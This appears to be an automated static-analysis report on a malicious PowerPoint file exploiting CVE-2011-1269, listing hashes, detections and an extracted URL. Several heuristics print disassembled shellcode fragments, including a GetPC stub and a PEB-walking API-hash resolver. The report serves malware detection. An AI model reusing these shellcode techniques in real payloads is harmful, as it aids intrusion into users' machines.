Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b14858fd66fba272…

MALICIOUS

Office (OLE)

616.7 KB Created: 1601-01-01 00:00:00 Authoring application: Microsoft PowerPoint First seen: 2019-11-20
MD5: 953686bf89973637c35a0ab2caadf3d7 SHA-1: 13d16d2039ec9e2c34c54e58ab09ff0645f587b1 SHA-256: b14858fd66fba27261043d83a2d756678e3dbf182b622f7a60069adb2b07f4c2
542 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The sample is identified as a malicious PowerPoint file exploiting CVE-2011-1269 / MS11-036. It contains an embedded PE executable and uses process injection techniques (WriteProcessMemory, CreateRemoteThread) to execute shellcode. The ClamAV detection 'Win.Trojan.Exploit-110' further supports its malicious nature. The embedded URL is likely used for command and control or to download additional payloads.

Heuristics 13

  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family critical CVE likely PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • ClamAV: Win.Trojan.Exploit-110 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Exploit-110
  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • x86 GetPC stub (CALL $+5; POP EAX) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EAX)
    Disassembly
    Attempted x86 opcode disassembly
    00000F51  e800000000        call 0xf56
00000F56  58                pop eax
00000F57  83c005            add eax, 5
00000F5A  c3                ret
00000F5B  f3a4              rep movsb byte ptr es:[edi], byte ptr [esi]
00000F5D  33c0              xor eax, eax
00000F5F  8bcb              mov ecx, ebx
00000F61  f3aa              rep stosb byte ptr es:[edi], al
00000F63  5f                pop edi
00000F64  5e                pop esi
00000F65  ff7704            push dword ptr [edi + 4]
00000F68  ff560c            call dword ptr [esi + 0xc]
00000F6B  8d9e4c020000      lea ebx, [esi + 0x24c]
00000F71  53                push ebx
00000F72  ff5624            call dword ptr [esi + 0x24]
00000F75  c6040322          mov byte ptr [ebx + eax], 0x22
00000F79  c644030100        mov byte ptr [ebx + eax + 1], 0
00000F7E  83eb20            sub ebx, 0x20
00000F81  c7431c65202022    mov dword ptr [ebx + 0x1c], 0x22202065
00000F88  c74318742e6578    mov dword ptr [ebx + 0x18], 0x78652e74
00000F8F  c743146572706e    mov dword ptr [ebx + 0x14], 0x6e707265
00000F96  c7431020706f77    mov dword ptr [ebx + 0x10], 0x776f7020
00000F9D  c7430c74617274    mov dword ptr [ebx + 0xc], 0x74726174
00000FA4  c743082f632073    mov dword ptr [ebx + 8], 0x7320632f
00000FAB  c7                .byte 0xc7
00000FAC  43                inc ebx
00000FAD  0465              add al, 0x65
00000FAF  7865              js 0x1016
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    Attempted x86 opcode disassembly
    00000FED  64a130000000      mov eax, dword ptr fs:[0x30]
00000FF3  85c0              test eax, eax
00000FF5  7813              js 0x100a
00000FF7  3e8b400c          mov eax, dword ptr ds:[eax + 0xc]
00000FFB  3e8b701c          mov esi, dword ptr ds:[eax + 0x1c]
00000FFF  3e8b5e08          mov ebx, dword ptr ds:[esi + 8]
00001003  ad                lodsd eax, dword ptr [esi]
00001004  3e8b6808          mov ebp, dword ptr ds:[eax + 8]
00001008  eb0d              jmp 0x1017
0000100A  3e8b4034          mov eax, dword ptr ds:[eax + 0x34]
0000100E  3e8ba8b8000000    mov ebp, dword ptr ds:[eax + 0xb8]
00001015  33db              xor ebx, ebx
00001017  8bc5              mov eax, ebp
00001019  5e                pop esi
0000101A  5d                pop ebp
0000101B  c20400            ret 4
0000101E  53                push ebx
0000101F  55                push ebp
00001020  56                push esi
00001021  57                push edi
00001022  368b6c2418        mov ebp, dword ptr ss:[esp + 0x18]
00001027  368b453c          mov eax, dword ptr ss:[ebp + 0x3c]
0000102B  368b540578        mov edx, dword ptr ss:[ebp + eax + 0x78]
00001030  03d5              add edx, ebp
00001032  3e8b4a18          mov ecx, dword ptr ds:[edx + 0x18]
00001036  3e8b5a20          mov ebx, dword ptr ds:[edx + 0x20]
0000103A  03dd              add ebx, ebp
0000103C  e338              jecxz 0x1076
0000103E  49                dec ecx
0000103F  3e8b348b          mov esi, dword ptr ds:[ebx + ecx*4]
00001043  03f5              add esi, ebp
00001045  33ff              xor edi, edi
00001047  fc                cld
00001048  33c0              xor eax, eax
0000104A  ac                lodsb al, byte ptr [esi]
0000104B  3ac4              cmp al, ah
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    Attempted x86 opcode disassembly
    00000FED  64a130000000      mov eax, dword ptr fs:[0x30]
00000FF3  85c0              test eax, eax
00000FF5  7813              js 0x100a
00000FF7  3e8b400c          mov eax, dword ptr ds:[eax + 0xc]
00000FFB  3e8b701c          mov esi, dword ptr ds:[eax + 0x1c]
00000FFF  3e8b5e08          mov ebx, dword ptr ds:[esi + 8]
00001003  ad                lodsd eax, dword ptr [esi]
00001004  3e8b6808          mov ebp, dword ptr ds:[eax + 8]
00001008  eb0d              jmp 0x1017
0000100A  3e8b4034          mov eax, dword ptr ds:[eax + 0x34]
0000100E  3e8ba8b8000000    mov ebp, dword ptr ds:[eax + 0xb8]
00001015  33db              xor ebx, ebx
00001017  8bc5              mov eax, ebp
00001019  5e                pop esi
0000101A  5d                pop ebp
0000101B  c20400            ret 4
0000101E  53                push ebx
0000101F  55                push ebp
00001020  56                push esi
00001021  57                push edi
00001022  368b6c2418        mov ebp, dword ptr ss:[esp + 0x18]
00001027  368b453c          mov eax, dword ptr ss:[ebp + 0x3c]
0000102B  368b540578        mov edx, dword ptr ss:[ebp + eax + 0x78]
00001030  03d5              add edx, ebp
00001032  3e8b4a18          mov ecx, dword ptr ds:[edx + 0x18]
00001036  3e8b5a20          mov ebx, dword ptr ds:[edx + 0x20]
0000103A  03dd              add ebx, ebp
0000103C  e338              jecxz 0x1076
0000103E  49                dec ecx
0000103F  3e8b348b          mov esi, dword ptr ds:[ebx + ecx*4]
00001043  03f5              add esi, ebp
00001045  33ff              xor edi, edi
00001047  fc                cld
00001048  33c0              xor eax, eax
0000104A  ac                lodsb al, byte ptr [esi]
0000104B  3ac4              cmp al, ah
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Embedded PE executable high OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://35.adsina.allyes In document text (OLE body)

Open this report in the interactive analyzer, or submit your own file for analysis.